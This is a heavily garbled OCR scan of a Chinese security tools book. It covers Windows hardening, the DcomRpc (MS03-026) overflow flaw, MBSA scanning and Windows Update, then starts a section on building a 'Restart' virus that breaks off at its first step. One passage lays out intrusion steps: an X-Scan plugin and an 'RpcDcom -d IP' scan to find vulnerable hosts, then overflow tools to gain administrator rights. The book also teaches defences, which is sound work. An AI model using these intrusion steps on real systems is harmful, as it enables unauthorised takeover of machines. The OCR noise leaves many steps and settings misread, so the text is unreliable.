STEP02: 查看 各 种 工具 


文件 (F) ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 
组 织 Y 加 打开 
理 计算 机 寅 Internet 信息 服务 (IIS) 管 理 器 2013/12/16 10:56 
入 本 地 碚 盘 (C3) 仿 isCSI 发 起 程序 2009/7/14 12:41 
Eg 印 本 地 磁盘 (D:) 是 Windows PowerShell Modules 2009/7/14 12;52 
B 本 地 磁盘 (E:) 2009/7/14 12:41 
Eg 本 地 磁盘 (F:) 2011/5/26 10:15 
én tutuDisk (W;) | 2011/5/26 10:15 
由 MSN 上 的 “我 的 网 站 ”| | | 漳 2009/7/14 12:41 
2009/7/14 12:41 
Gi 网 络 | i 2009/7/14 12:41 


2009/7/14 12:42 
4L8QD1ETPGKV51W 
于 2009/7/14 12:42 


双击 “服务 ”选项 。 


在 页 面 右 侧 关闭 Server 服 务 。 
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(4) 在 防火 墙 中 设置 阻止 其 他 机 器 使 用 本 机 共 至 
运行 天 网 个 人 防火 墙 ， 打开“ 修改 IP 规则 ”对 话 框 ， 具 体 步 最 如 下 。 


STEP01: 修改 IP 规则 


< 本 


| 修改 IP 规 则 


一 规则 - ] 


名 称 [ 


说 明 证 


”数据 包 方向 : [w 巴 芭 | 


-对 方 IP 地 址 : 
| | 奋 任 何 地 址 -| 
数据 包 协 说 类 型 : |TCP = 
| 一 本 地 端口 -一 对 方 端口 Ta 标志 位 一 一 | 
: 三 已 授 要 程序 开放 的 端口 。 从 加 | Ww 加 
| [v siH 「 PSH 

从 [39 “到 ie 到 上 0 Fasr FF we 
I 
| 端口 为 0 时 ， 不 作为 条 件 
一 当 满 足 上 面条 件 时 

FE Eee 和 

厂 发声 
确定 取消 
更 Wr 


选择 一 条 空 规则 之 后 ， 设 置 数据 包 方 向 为 “接收 ， 
对 方 IP 地 址 为 “任何 地 址 ”， 数据 包 协 议 类 型 为 
“TCP”， 本 地 端口 设置 为 “从 139 到 179”， 对 方 疡 
口 设 置 为 “从 0 到 0”，TCP 标 志 位 为 “SYN”, 动作 
设置 为 “拦截 ，， 单 击 “ 确 定 ” 按钮 。 


3.2 ”DcomRpc 溢出 工具 


STEP02: 应 用 规则 
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任何 


性 何 
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防止 别人 用 pine 合 令 探测 
防御 ICIPE 攻 击 
防御 TMP 攻击 


ICMP 
ICMP 
IGMP 


局 域 网 
局 域 网 


允许 局 域 网 的 机 器 使 用 我 的 共享 资源 -1TCF 
允许 局 域 网 的 机 器 使 用 我 的 共享 资源 -2TCP 


KKILIDIKEIKILILELI 
iiieioNDODC EC) 


Y 
| 


过 | 

由 于 FING 命 令 去 探 误 其 他 机 器 时 :如果 那 台 机 器 安 
人 回应 IENP 包 : 迹 规则 允许 这 种 IC 呈 包 返 回 间 你 的 
探 讽 其 地 机 器 了 。 


> 
装 了 TCP/IF 协 说 : 就 会 返回 一 
机 器 ， 这 样 战 可 以 用 5ing 拨 邻 


在 “ 自 定 义 |P 规 则 ”列表 中 勾 选 设 定 的 规则 ， 即 可 
启动 拦截 139 端 口 攻 击 。 


DcomRpc 漏洞 往往 是 利用 溢出 工具 来 完成 入 侵 的 ， 其 实 “溢出 ”入 侵 在 一 定 程度 
上 也 可 看 成 系统 内 的 “间谍 程序 ”， 它 对 黑客 们 的 入 侵 一 呼 即 应 ,“ 一 应 ”即将 所 有 权限 


人 和 人 


3.2.1 DecomRpe 沁 洞 拍 述 


RPC (Remote Procedure Call， 远 程 过 程 调 用 ) 服务 作为 操作 系统 中 的 一 个 重要 服务 ， 
其 描述 为 “提供 终结 点 映射 程序 (Endpoint Mapper) 以 及 其 他 RPC 服务 ”。 系 统 大 多 数 功 
能 


和 服务 部 依赖 于 它 。 
司 动 RPC 服务 的 其 体操 作 方 法 如 下 。 
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SODI Fn 
和- 工具 全 攻略 
全 人 人 他 


SEEUTS 打开 “管理 工具 ”窗口 STEP02: 查看 各 种 服务 


[le 


"srssrs ?| 


ER - Pr oler 

拱 述 : : em Re 

, 训 执 行 co $$ Progra a 
»Pr orage 

| 和 , 布 式 垃圾 收 二 Quality Windo 
上 L 7 “ 有 集 。 如 后 此 服务 被 停 用 或 禁用 于 二 Re Cess 

\ : | 的 程序 棕 无 法 正 。 : 

四 二 | E 】 和 工作 。 强 列 建 议 你 i 上 RPCSS 服务 运 “人 css 

a 一 ~ 三 行 二 Re O 

1 “Re 0. 

任务 计划 程序 事件 前 看 器 SRe 0 

ote Pr U 

Re 
© LD 
Ey 


i a 


号 Secure Socket T... 
所 Security Account,.,， 局 动 .， 已 启 
er WSC..， 已 启 


在 “控制 面板 ”窗口 中 依次 单 击 “系统 和 安全 ”> 双击 “Remote Procedure Call” 服 务 项 。 
“管理 工具 ”链接 ， 在 “管理 工具 ”窗口 中 双击 “ 服 
务 " 图 标 。 


STEP03: 查看 服务 依赖 关系 


Remote Procedure Call (RPC) 芯 


本 尾 入 全 上天 过 行人 汪 、 乱 本 记 打 搬 二 委 和 


Remote Frocedure Call [FFC) 
此 服务 依赖 以 下 系统 组 件 (T): 


由 - Si DCON Server Process Launcher 
EC REC Endpoint Napper 


选择 “依存 关系 ”选项 卡 ， 即 可 查看 一 些 服务 的 依 


以 下 生化 有 务 
360 杀毒 实时 防护 加 载 服务 赖 关系 。 


hetivex Installer [hxInstsV) 


* hpplication Tdentity 

* hpplication Information 

* Backeround Intelligent Transfer Service 
* Base Filterine Eneine 


EM 定 =] 世 取消 | | 应 用 由 | 


从 显示 服务 可 以 看 出 受 其 影响 的 程序 有 很 多 ， 其 中 就 包括 DCOM 接口 服务 。 这 个 接口 
用 于 处 理由 客户 端 机 器 发 送 给 服务 器 的 DCOM 对 象 激活 请 求 (如 UNC 路 径 )。 攻击 者 可 以 
利用 此 漏洞 以 本 地 系统 权限 执行 任意 指令 ， 可 以 在 系统 上 执行 任意 操作 ， 如 安装 程序 ， 但 
看 或 更 改 、 删 除数 据 或 建立 系统 管理 员 权 限 的 账户 。 

DCOM (Distributed Component Object Model， 分 布 式 COM) 协议 的 前 身 是 OSF RPC 
协议 ， 但 增加 了 微软 目 己 的 一 些 扩展 。 扩 展 了 组 件 对 象 模型 (COM) 技术 ， 使 其 能 够 文 持 
在 局 域 网 、 广 域 网 其 至 Internet 上 不 同 计 算 机 对 象 之 间 的 通信 。 

奇想 对 DCOM 进行 相应 的 配置 ， 有 具体 的 操作 步骤 如 下 。 
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Ys 


系统 漏洞 攻防 


STEP01: 打开 “组 件 服务 ”窗口 STEP02: 对 DCOM 进行 配置 


| 入 六 件 (所 作 (A) ， 坦 看 (W) 窗口 (W) ”帮助 (H) 


EE | 昌国 


XlBrowse... XmpDesk 


YoudaoAs... ELSE {000C101 
0000-0000- 
C000-00000| 
0000046} 

GF29... 


{145B4335... {152DA46.. {19BCA96.. {1BA783C... {1BE1F76( 


会 合 


{1fb2a002... {27170d7.. {2C5BC43... {304CE942... {3282082: 


小 ,四 一 


在 “运行 ”对 话 框 中 执行 “Dcomcnfg” 命令， 即 可 ”在 “组 件 服务 ”中 展开 “DCOM 配 置 ” 子 项 ， 即 可 
弹出 “组 件 服务 ”窗口 。 根据 需要 对 DCOM 中 各 对 象 进行 相关 配置 。 

因为 DCOM 可 以 远程 操作 其 他 计算 机 中 的 DCOM 程序 ， 该 技术 使 用 了 用 于 调用 其 他 
计算 机 上 的 函数 的 RPC， 所 以 利用 这 个 漏洞 ， 攻 击 者 只 需 发 送 特 殊 形 式 的 请 求 到 远程 计算 
机 的 135 端口 ， 轻 则 造成 拒绝 服务 攻击 ， 严 重 的 其 至 可 以 本 地 管理 员 权限 执行 任何 操作 。 


3.2.2 ”DecomRp¢ 入 侵 实战 


目前 已 知 的 DcomRpe 接口 漏洞 有 MS03-026 (DcomRpec 接口 堆栈 缓冲 区 溢出 漏洞 )、 
MS03-039( 堆 溢出 漏洞 )、 一 个 RPC 包 长 度 域 造 成 的 堆 溢 出 漏洞 和 另外 几 个 拒绝 服务 漏洞 。 

要 利用 这 个 漏洞 , 可 以 发 送 畸 形 请 求 给 延 程 服 务 器 监听 的 特定 DecomRpc 端口 , 如 135、 
139、445 等 痕 口 。 在 进行 DcomRpc 漏洞 流出 攻击 六 ,用户 需 下 载 DcomRpc.xpn 作为 X-Scan 
插件 ， 复 制 到 X-Scan 所 在 文件 夹 的 plugins 文件 夹 中 ， 扩 展 X-Scan 扫描 DcomRpc 漏 铜 的 
功能 ; 也 可 下 载 rpcdcom.exe (专用 DcomRpc 漏洞 扫描 工具 )， 扫 摘 具 有 DcomRpce 漏洞 的 
目标 主机 ， 使 用 网 上 诸多 的 DcomRpec 浇 出 工具 进行 攻击 。 

下 面 以 DeomRpc 接口 漏洞 溢出 为 例 讲述 溢出 的 方法 ， 有 具体 的 操作 方法 如 下 。 


STEP01: 复制 DcomRpc.xpn 插件 STEP02: 运行 X-Scan 扫描 工具 
Xx 8 台 数 Eo 


I 

逆 泊 
fm 
必 


引 


EPEEEREEEE 
4 ‘AT 

亨 

也 

心 


[a 
~ OOD 
INADA 


ES 
ss 


DAA 


= 二 E 二 到 


回 
| 
eal 
Y| 
| 
回 
口 
吕 
网 
口 
口 
口 
口 
口 
口 
lv) 


器 柄 日 名 
© Fs 
本 


一 J 
,| 
鲁 划 


件 
修改 日 期 : 2013/12/19 16:09 


大 小 ; 0 字 节 
创建 日 期 : 2013/12/19 16:09 


将 下 载 的 DcomRpc.xpn 插件 复制 到 X-Scan 的 运行 X-Scan 扫 描 工具 ， 选 择 “设置 ”>“ 扫描 参 

plugins 文 件 夹 中 ， 作 为 X-Scan 插 件 。 数 ” 菜 单 命令 ， 即 弹出 “扫描 参数 ”对 话 框 。 选 择 
“全 局 设置 ”>“ 扫 描 模块 ”选项 ， 即 可 看 到 增加 的 
“DcomRpc 溢 出 漏洞 ”模块 。 
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客 :过 
-工具 人 攻 了 


信人 
在 使 用 X-Scan 扫 摘 到 具有 DcomRopec 接口 漏洞 的 主机 时 , 可 以 看 到 在 X-Scan 中 有 明显 
的 提示 信息 。 如 果 使 用 RpcDcom.exe 专用 DcomRpe 洲 出 漏洞 扫描 工具 ， 则 可 先 打 开 “ 命 
令 提 示 符 ”窗口 ， 进 入 RpcDcom.exe 所 在 文件 夹 ， 执 行 “RpcDcom -d IP 地 址 ”命令 后 ， 
开始 扫描 并 看 到 最 终 的 扫描 结 和 朱 。 
如 果 操 作成 功 ， 则 执行 洲 出 操作 将 立即 获得 匀 Q 入 侵 主机 的 系统 管理 员 权 限 。 


3.2.3 ”DeomRpc 防 沁 方法 


既然 系统 中 存在 这 么 一 个 “功能 强大 ”的 间 诬 源 洞 DeomRpc， 那 就 不 得 不 对 这 个 汤池 
的 防范 加 以 重视 了 。 下 面 推荐 4 种 防范 方法 。 

1) 打 好 补丁 。 对 于 任何 漏洞 来 次 ， 打 补丁 是 最 方便 的 方法 了 ， 因 为 一 个 补丁 的 推出 往 
入 包含 了 专家 们 对 相应 漏洞 的 彻底 研究 ， 所 以 打 补 本 也 是 最 有 效 的 方法 之 一 。 下 载 补 丁 应 
尽 可 能 地 在 服务 厂商 的 网 站 中 下 载 ;， 打 补 本 的 时 候 务 必 注 意 补 丁 相 应 的 系统 厂 本 。 

2) 封锁 135 问 口 。135 端口 是 非 间 危险 ， 但 却 是 难以 了 解 其 用 途 、 无 法 实际 感受 到 其 危 
险 性 的 代表 性 病 口 之 一 。 正 ‘en 是 一 于 能 让 人 认识 到 135 奖 口 危险 性 的 工具 。 它 由 提供 安全 相 
关 技 术 信 息 和 工具 类 软件 的 SecurityFriday.com 公司 提供 ,该 工具 以 简单 明了 的 形式 验证 了 135 
问 口 的 危险 性 ， 呼 吁 用 户 加 强 安全 设置 。 不 过 ， 由 于 该 工具 的 特征 代码 退 加 到 了 病毒 定义 库 文 
件 中 ， 如 采 在 安 猴 了 该 公司 的 病毒 扫 摘 软件 的 计算 机 中 安装 正 "en， 就 有 可 能 将 其 视 为 病毒 。 

3) 关闭 RPC 服务 。 关 闭 RPC 服务 也 是 防范 DcomRpec 漏洞 攻击 的 方法 之 一 ， 而 且 效 
条 非 单 彻底 。 有 共 体 方法 为 : 在 “控制 面板 ”窗口 中 单 击 “ 管 理工 具 ” 链 接 ， 打 开 “ 管 理工 
有 具 ”窗口 。 双 击 “ 服 务 ” 图 标 ， 即 可 打开 “服务 ”窗口 。 双 击 打 开 “Remote Procedure Call” 
属性 窗口 ， 在 属性 窗口 中 将 局 动 类 型 设置 为 “已 禁用 ”。 

要 想 将 其 设置 为 有 效 ， 须 在 注册 表 编 辑 器 中 将 “HKEY_LOCAL MACHINENSYSTEMN 
CurrentControlSet\Services\RpcSs” 的 “Start” 值 由 0X04 改 成 0X02 后 ， 和 曹 狐 局 动机 器 即 可 。 

但 进行 这 种 设置 将 会 给 Windows 运行 市 来 很 大 影响 。 这 是 因为 Windows 的 很 多 服务 都 
依赖 于 RPC, 而 将 RPC 设置 为 无 效 后 这 些 服务 将 无 法 正 弟 局 动 。 由 于 这 样 做 的 闵 端 非常 大 ， 
因此 一 般 不 建议 关闭 RPC 服务 。 

4) 手动 为 计算 机 局 用 (或 禁用 ) DCOM。 除 上 述 方法 外 ， 还 可 通过 如 下 方法 进行 手动 
禁用 DCOM 服务 。 

这 里 以 Windows 7 为 例 ， 其 体 的 操作 步骤 如 下 。 


STEP01: 打开 “运行 ”对 话 框 


yr | Windows 将 根据 您 所 办 入 的 名 称 ， 为 您 打开 相应 的 程序 、 
一 一 文件 夫 、 文 栏 或 Internet 资源 。 


在 文本 框 中 输入 单 击 “ 确 定 ”按钮 。 


“Dcomcnfg 命令。 
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< 第 3 六 


系统 漏洞 攻防 


STEP02: 查看 计算 机 属性 STEP03: 更 改 属 性 
各。 文件 (操作 (A) 坦 看 M) 闸口 IW) 帮助 (H) 我 的 电脑 属性 | mr 


EI 二 . 默认 属性 | 默认 协议 | cow_ 安全 | NsoTc | 
a ES CoN GE) 


在 此 计算 机 上 启用 COM Internet 服务 08) 
用 欠 分 布 式 COM 通信 和 属性 
身份 验证 级 别 指定 数据 包 级 别 上 的 安全 。 


默认 身份 验证 级 别 0 : 
连接 
信 凡 居民 窑 订 有 各 记 是 否 可 以 确定 其 调用 者 ， 以 及 是 否 可 以 使 


于 欠 模拟 银 别 (CI): 
| 标识 ~ 


如 村 全 用 身份 验证 且 默 认 模 拟 银 别 不 是 匿名 ， 风 可 以 提供 引用 跟 
[| 提供 附加 的 引用 跟踪 安全 (F) 
进一步 了 解 如 何 设 凋 这 些 甘 性。 


再 


依次 展开 “控制 台 根 节 点 ”> “组 件 服务 ”> “计算 ”图 选择 “默认 属性 ”选项 卡 ， 单 击 “ 确 
机 ”"， 右 击 “ 我 的 电脑 ”选项 ， 从 快捷 菜单 中 选择 。 取消 勾 选 "在 此 计算 机 上 启用 定 "按钮 。 
属性 ”命令 。 分 布 式 COM” 复 选 框 。 


STEP04: 远程 计 和 算 机 操作 STEP05: 打开 “添加 计算 机 ”对 话 框 


襄 。 文 件 (月 。 担 作 (A) ” 音 帮 (V) 帮助 (H) 
布 放 | 二 et 昌国 | | 国 当 滞 合 吾 
辐 拉 制 台 恨 节点 

4 各 ,组件 服务 


< 国 , 训 | 
Mi 


击 “ 计 算 机 ”选项 , 从 快捷 菜单 中 选择 “新建 ”> ”在 文本 框 中 输入 计算 机 名 称 或 单 击 右 侧 的 “浏览 " 按 
“计算 机 ”命令 。 钮 ， 即 可 搜索 计算 机 。 
在 添加 计算 机 后 ， 在 计算 机 名 称 列表 中 右 击 该 计算 机 名 称 ， 从 快捷 菜单 中 选择 “属性 ” 
命令 ， 在 打开 的 属性 窗口 的 “默认 属性 ”选项 卡 中 取消 勾 选 “在 此 计算 机 上 启用 分 布 式 
COM” 复 选 框 ， 单 击 “ 人 确定 ”按钮 ， 即 可 应 用 更 改 设置 并 退出 。 


.3 ”系统 漏洞 检测 修复 工具 


3.3.1 使 用 MB 检测 系统 漏洞 


Microsoft 基准 安全 分 析 器 (Microsoft Baseline Security Analyzer，MBSA) 人 允许 用 户 扫 
描 一 人 台 或 多 台 基 于 Windows 的 计算 机 ， 以 发 现 常 见 的 安全 方面 的 配置 错误 。 MBSA 将 扫 摘 
基于 Windows 的 计算 机 并 检查 操作 系统 和 已 安装 的 其 他 组 件 (如 IIS 和 SQL Server)， 以 友 
现 安全 方面 的 配置 错误 ， 并 通过 推荐 的 安全 更 新 及 时 进行 修补 。 


EE 


NTZI 一 _ 


工具 全 攻略 


依 公 公 人 
1. MBSA 的 安装 设置 
MBSA 可 以 执行 对 Windows 系统 的 本 地 和 远程 扫描 , 可 以 扫描 错过 的 安全 升级 补丁 以 
及 在 Microsoft Update 上 发 布 的 服务 包 。 使 用 MBSA V2.2 对 系统 漏洞 进行 安全 分 析 之 前 ， 
完 要 对 MBSA 进行 安 儿 放置， 有 具体 的 操作 步 又 如 下 。 


STEP01: ”安装 向 时 STEP02: 查看 安装 许可 协议 
MBSA Setup 


Welcome to the Microsoft Baseline Security Analyzer 
Wersion 2.2 


License Agreement 
You must agree with the license agreerment below to proceed. 


MICROSOFT SOFTWARE LICENSE TERMS 


Microsoft Baseline Security Analyzer Setup 


MICROSOFT BASELINE SECURITY ANALYZER TOOL 


ltis strongly recommended that you exit all Windows programs before running this setup program. 


These license terms are an agreement between Microsoft Corporation (or 
based on where you live, one of its affiliates) and you. Please read them. They 


Click Cancel to quit the setup program, then close any programs you have running. Click Next to mn 
continue the a 3 ee apply to the software named above, which includes the media on which you 


received it, if any. The terms also apply to any Microsoft 


waRNING: This program is protected by copyright law and international treaties. 。 updates， 
Unauthorized reproduction or distribution of this program, or any portion of it may result in severe 
civil and criminal penalties, and will be prosecuted to the maximum extent possible under law. 


Copyright 2002-2007 Microsoft Corporation. 点 | rights reserved. 


2 
a ciinnlementcs 


© | accept the license agreement 


1 do not accdpt the license agreement 


Cancel 


下 载 并 双击 “MBSA V2.2” 图 单 击 “Next” 国 阅读 安装 信息 后 选择 单 击 “Next” 
安装 程序 图 标 。 按钮 。 此 单 选 按钮 。 按钮 。 
STEP03: 选择 安装 位 置 STEP04: 开始 安装 


其 | MBSA Setup 草 MBSA Setup 


Destination Folder 


Select a folder where the application will be installed. 


start installation 


Click Install to start spplication installation 


Setup will install the files for Microsoft Baseline Security Analyzer in the following folder. Click Install to start application installation. 


To install into a different folder, click the Browse button, and select another folder. Press Back to review your Selections. 


You can choose not to install Microsoft Baseline Security Analyzer by clicking Cancel to 
exit setup. 


Destination Folder 


单 击 “Browse” 按 钮 ， 单 击 “Next” 按 ” 单 击 “Install” 按 钮 。 
根据 需要 选择 安装 的 目标 钮 。 

位 置 。 

STEP05: 正在 安装 STEP06: MBSA 安装 
其 MBSA Setup 


Installation Progress 
Please walt 


| 


Current Action: 
Copying new files 
File: serversecure.dll, Directory: D:\ 雪 流 \, Slze: B39888 


hicrosoft Baseline Security Snalyzer Setup 
has completed successfully. 


程序 开始 安装 并 显示 安装 的 进度 条 。 单 击 “OK” 按 钮 ， 将 完成 整个 安装 过 程 。 
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-第 3 章 
系统 漏洞 攻防 
2， 检 测 单 台 计算 机 
单 台 计算 机 模式 最 典型 的 情况 是 “ 自 扫 描 ” 也 就 是 扫描 本 地 计算 机 。 
扫描 单 台 计算 机 的 具体 操作 步骤 如 下 。 


STEP01: 运行 MBSAV2.2 STEP02: 输入 检测 的 计算 机 |P 地 址 


Check computers for common security misconfigurations， 


The Microsoft Baseline Security Analyzer can check computers running Microsoft Windows 
Server 2008 R2, Windows 7, Windows® Server 2003, Windows Server 2008, 

Windows Vista, Windows XP or Windows 2000. Scanning computers for security updates 
utilizes Windows Server Update Services. You must have administrator privileges for each 
computer you want to scan 


‘BR 2 i 


i using its name or IP Address, 


we Scan multiple c 


Check multiple re using a domain name or a range of IP addresses. 


Vie Sec can 
国 View, i i on SF eT on the previous scans. 
Advanced Update Services options: 
© Scan using assigned Windows Server Update Services(WSUS) servers only 
© Scan using Micosoft Update only 
© scan using offine catalog only 
Learn more about Scanning Options 


到 


© 2002-2010 Microsoft Corporation, All rights reserved, 


单 击 “Scan a computer” 按 钮 。 国 | 默认 选择 当前 计算 机 名 ， 单 击 “Start Scan 
输入 其 他 1IP 地 址 。 按钮 。 


要 想 扫 描 一 人 台 计 算 机 ， 必 须 具 有 该 计算 机 的 管理 员 访 问 权 限 才 行 。 在 
“Which computer do you want to Scan?” 界面 中 有 许多 复 选 枉 。 其 中 涉及 选择 要 
扫描 检测 的 项 目 ， 包 括 Windows 系统 本 身 、IIS 和 SQL 等 相关 选项 u， 即 MBSA 
的 3 大 主要 功能 。 根 据 所 检测 的 计算 机 系统 中 所 安装 的 程序 系统 和 实际 需求 来 
确定 。 如 果 要 形成 检测 结果 报告 文件 ， 则 在 “Security report name” 文 本 框 中 输 
入 报告 文件 名 称 


STEP03: 开始 检测 STEP04: 检测 完成 


Microsoft Baseline Security Analyzer 2.2 J x | Microsoft Baseline Security Analyzer 2.2 


Microsoft 


|® 兮 人 Baseline Security Analyzer 


Report Details for WORKGROUP - 4L8QD1ETPGKV51W (2013-10-30 10:45:43) 
Security assessment: 


Severe Risk (One or more critical checks failed.) 


WORKGROUP\AL8QD1ETPGKVS1W 
192.158.1.10 
WORKGROUP - 4L8QD 1ETPGKYS51W (2013-10-30 10-45) 


开始 自动 检测 已 选择 项 目 并 显示 检测 进度 。 单 击 “Result” 的 “Result details” 链接 ， 即 可 查看 
扫描 后 的 安全 报告 内 容 。 


7 国宝 时 时 讨 


cm 
2 工具 全 攻略 
全 人 人 他 


STEP05: 查看 安全 报告 内 容 


r , Microsoft l 
WY Baseline Security Analyzer 


1 secury updates are missing. 在 报告 中 , 存在 严重 安全 隐患 的 以 红色 " x" 显示 ， 
Result Details for Developer Tools, Runtimes, and Redistributables i yy a 
Hems marked with WY are confirmed missing. Ttems marked with 傅 are confrmed missing and are not approved by your system administrator. 、 
a Ss “How to correct this” 链接 得 知 如 何 纠 正 这 

可 MS11025 Security Update for Microsoft Visual C++ 2010 Service Pack 1Redistrioutable Pacdcsae (KE2565063) Important 
A 不 正当 设置 。 在 检测 结果 中 ， 第 一 项 “ 
Tems marked with represent the most current updates pro otesbng your computer. Ifyou have nstaled a a recent update, it may incorporate 


TT i Updates”( 严 重 隐 患 ) 是 说 用 户 存在 安全 更 新 的 


Severity 
Important 


5 问题 。 


Ifa service pack is lsted, itis recommended that you install it prior to any other items listed, 


Read more about buletin severity on Microsoft TechNet. 


3. 检测 多 台 计 算 机 
台 计 算 机 模式 是 对 某 一 个 IP 地 址 段 或 整个 域 进行 扫描 。 只 需 单 击 左 侧 “Microsoft 
Baseline Security Analyzer” 栏 目下 方 的 “Scan multiple computers ”按钮 ， 即 可 指定 要 检测 
的 多 从 计算 机 。 扫 质 的 范围 可 通过 在 “Domain name” 文 本 框 中 输入 这 些 计 算 机 所 在 的 域 来 
确定 ， 这 样 则 检测 相应 域 中 所 有 计算 机 ， 也 可 通过 在 “IP address range” 栏 中 输入 IP 地 址 
段 的 起 始 IP 地址 和 终止 IP 地 址 来 确定 ， 这 样 只 检测 IP 地 址 范 围 内 的 计算 机 。 单 击 “Start 
Scan” 按 钮 ， 同 样 可 以 开始 检测 。 


隔 一 一 一 一 一 一 
Br 


Microsoft ft 


Baseline Security Analyzer 


DY Microsoft ] 


Which computers do you want to scan? 


Check computers for common security misconfigurations. 
Enter the domain name or the range of IP addresses of the computers, 
The Microsoft Baseline Security Analyzer can check computers running Microsoft Windows 
Server 2008 R2, Windows 7, Windows® Server 2003, Windows Server 2008, 

Windows Vista, Windows XP or Windows 2000. Scanning computers for security updates IP address range; rr 1 ww | lf lf 
utilizes Windows Server Update Services. You must have administrator privileges for each Seanity tepart names 
computer you want to scan. 


Scan mi computers i 
Domain name: 


%D% - %C% (WT%) 
%D% = domain, WC% = computer, %T9% = date and time, %IP% = IP address 
Options: 


Check for Windows administrative vulnerabilities 
Check for weak passwords 

Check for IIS administrative vulnerabilities 
Check for SQL administrative vulnerabilities 


司 图 园 轩 图 


Urity scan report Check for security updates 

vie lew, Prin mt nd copy the sults from the previous scans. JI Configure computers for Microsoft Update and scanning prerequisites 
Advanced Update Services options: 

an Using assigned Windows Server Upd 


Microsoft Baseline Security 


© 2002-2010 Microsoft Corporation. All rights reserved. 


3.3.2 ”使 用 Windows Update 修复 系统 漏洞 


Windows Update 是 一 个 基于 网 络 的 Microsoft Windows 操作 系统 的 软件 更 新 服务 。 
Windows Update 能 够 提供 紧急 系统 组 件 更 新 、 服 务 升级 包 、 安 全 修补 程序 、 补 丁 以 及 选 定 
的 Windows 组 件 免 费 更 新 的 下 载 ， 保 证 系统 更 加 安全 、 稳 定 。 

下 面 介 绍 使 用 Windows Update 修复 系统 漏洞 的 具体 步骤 。 
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STEP01: 打开 “控制 面板 ”窗口 STEP02: Windows 更 新 


Pp ET 
OO ss , mssamen ， | ES nD 


文件 (P ”编辑 (E) 查看 (V) 工具 (T) ”帮助 (H) 


调整 计算 机 的 设置 直方 式 ， 大 图 文件 (Pi ”编辑 (E) ”查看 (V) ”工具 (TD) ”帮助 (H) 
[| Intel(R) GMA Driver Internet 选项 


Windows Update 


4 Java Program Updates 


区 从 Realtek 高 清晰 音频 管理 器 Ee RemoteApp 和 桌面 连接 更 改 设置 
六 Windows Cardspace Ee Windows Defender 童 春 更 新 认 史 记录 
更 新 ; 常见 问题 
水 硝 各 操 fF 中 心 


& ”电话 和 调制 解 调 跨 


单 击 “Windows Update” 链 接 。 单 击 页 面 左 侧 的 “检查 更 新 ”链接 。 
STEP03: 选择 重要 更 新 补丁 STEP04: 选择 要 安装 的 补丁 


| 本 
“所 有 控制 面板 项 ， Windows Update 各 丫 -| 四 “windows Up.，， [二 R 要 安 六 更 新 | ”| 分 | | 莹 全 向 到 P 


文件 (编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 


名 称 人 小 适用 于 Windows 7 的 
Office 2003 (1) Internet Explorer 11 
Microsoft Office File Validation Add-in Internet Explorer 11。 在 


2 个 重要 更 新 可 用 Windows 7 (2 
oi a | 回 适用 于 Windows7 了 的 Intemet Explorer11 


回 用 于 Windows7 的 Microsoft .NET Framework 4.5.1 (KB... 53.0 MB 
Office 2007 (1) 
Microsoft Office File Validation Add-in 19 MB 


昨天 20:29 (和 失败。 章 者 要 新 历史 记录 
适用 于 Windows 产品 和 其 他 来 自 Microsoft 
Update 的 产品 


发 布 日 期 : 2013/11/11 
- 


单 击 “2 个 重要 更 新 可 用 "链接 。 勾 选 需要 安装 的 更 新 。 国 单 击 “ 确 定 ” 按 钮 。 
STEP05: 开始 安 浆 更 新 STEP06: 正在 下 载 更 新 


一 到 一 可 eel 
名- 合 < 所 有 控制 面板 项 Windows Update 条 于 共 浊 古风 加 +| <« 所 有 控制 面板 项 Windows Update ”| 好 | | 总 至 芝 潮 夯 友 p 


文件 (D ” 编 缉 (E) ”前 看 (V) 工具 (T) 帮助 (H) 文件 (RP ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 


控制 画板 主页 Windows Update 


Windows Update 
ee 检查 更 新 
更 改 设置 >- A 更 改 设置 = 

上 机 的 更 新 [= ps 
童 看 更 新 历 宇 记录 NAY 0 ey 正在 准备 安装 .… 
还 原 隐 芒 的 更 新 1 2 个 重要 更 新 可 用 已 选择 1 个 重要 更 新 ， - 


二 党 42 个 可 选 更 新 可 用 1L9 MB EDS NE 
; 常见 问 更 新 : 常见 问题 


正在 创建 还 原点 … 


停止 安装 (S) 


最 i 丘 恰 音 更 新 的 时 间 :， 昨天 18:00 
安装 更 新 的 时 间 ; 昨天 20:29 人 (失败 )。 童 看 更 新 历史 记录 最 j 乒 检查 更 新 的 时 间 :， 今 天 13:12 
接收 村 新: 适用 于 Windows 产品 和 其 他 来 后 Microsott 安装 更 新 的 时 间 ; 昨天 20:29 (失败 )。 童 土 更 新 历 安 记 录 


Update 的 产品 接收 更 新 适用 于 Windows 产品 和 其 他 来 自 Microsoft 
Update 的 产品 


返回 上 一 界面 ， 单 击 “ 安 装 更 新 ”按钮 。 此 时 界面 中 出 现 补 丁 下 载 进度 条 ， 耐 心 等 待 。 
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IF 


工具 全 攻略 


全 人 人 他 
STEP07: ”重启 计算 机 


Windows Update 


成 功 地 安装 了 更 新 单 击 “立即 重新 启动 ”按钮 ， 对 计算 机 进行 重启 。 
重启 过 程 中 ,计算 机 会 自动 安装 漏洞 补丁 ， 切 勿 中 
途 断 电 或 关闭 计算 机 。 


计算 机 病毒 可 以 很 快 地 蔓延 ， 又 常常 难以 根除 ， 也 是 黑客 常用 的 攻击 用 户 
电脑 的 手段 。 所 以 了 解 病毒 的 特点 ， 做 好 预防 工作 非常 重要 。 本 和 草 主 要 讲述 几 
种 病毒 的 入 侵 与 防范 方法 ， 有 助 于 读者 有 效 地 防范 计算 机 病毒 。 


O 〇 Restart 病毒 与 U 盘 病 毒 生 成 曝光 与 防范 
〇 脚本 病毒 生成 曝光 与 防范 

〇 O 宏 病毒 与 邮件 病毒 防范 

〇 全 面 防范 网 络 蠕虫 


〇 病毒 防范 工具 


四 一 | 
和- 工具 全 攻略 


合 人 他 他 


4.1 简单 的 病毒 生成 曝光 与 防范 


真正 的 病毒 一 般 虱 具有 传染 性 、 隐 蕊 性 和 破坏 性 。 本 市 将 曝光 Restart 病毒 和 U 盘 病 


毒 的 生成 过 程 ， 并 给 予 有 效 的 防范 措施 。 


4.141 Restart 病毒 生成 曝光 


我 们 平时 在 使 用 计算 机 过 程 中 或 许 碰 到 过 计算 机 不 断 重 局 的 情况 ，Restart 病毒 加 是 一 


种 能 够 让 计算 机 重新 局 动 的 病毒 ， 该 病毒 主要 通过 DOS 命令 shutdown/r 来 实现 。 下面 将 曝 


光 Restart 病毒 的 形成 过 程 。 
STEP01: 新 建 一 个 文本 文档 


